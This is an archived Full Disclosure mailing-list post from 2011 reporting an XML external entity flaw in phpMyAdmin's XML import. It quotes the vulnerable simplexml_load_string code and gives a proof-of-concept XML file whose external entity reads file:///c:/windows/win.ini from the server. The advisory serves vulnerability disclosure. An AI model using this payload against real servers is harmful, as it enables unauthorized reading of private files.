Home page logo

fulldisclosure logo Full Disclosure mailing list archives

PhpMyAdmin Arbitrary File Reading
From: WooYun <root () wooyun org>
Date: Wed, 2 Nov 2011 15:30:56 +0800


80sec report this bug on wooyun,PhpMyadmin use a simplexml_load_string
function to read xml from user input,this may be exploied to read files
from the server or network

in libraries/import/xml.php,some code like this


 * Load the XML string


 * The option LIBXML_COMPACT is specified because it can

 * result in increased performance without the need to

 * alter the code in any way. It's basically a freebee.


$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);



 * The XML was malformed


if ($xml === FALSE) {

so you just need to make a xml like this

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE wooyun [

  <!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">


<pma_xml_export version="1.0" xmlns:pma="


    - Structure schemas



        <pma:database name="test" collation="utf8_general_ci"

            <pma:table name="ts_ad">






    - 数据库: 'thinksns'


    <database name="thinksns">

        <!-- 表 ts_ad -->



then import this xml in PhpMyAdmin,you will get the content you want.


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • PhpMyAdmin Arbitrary File Reading WooYun (Nov 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]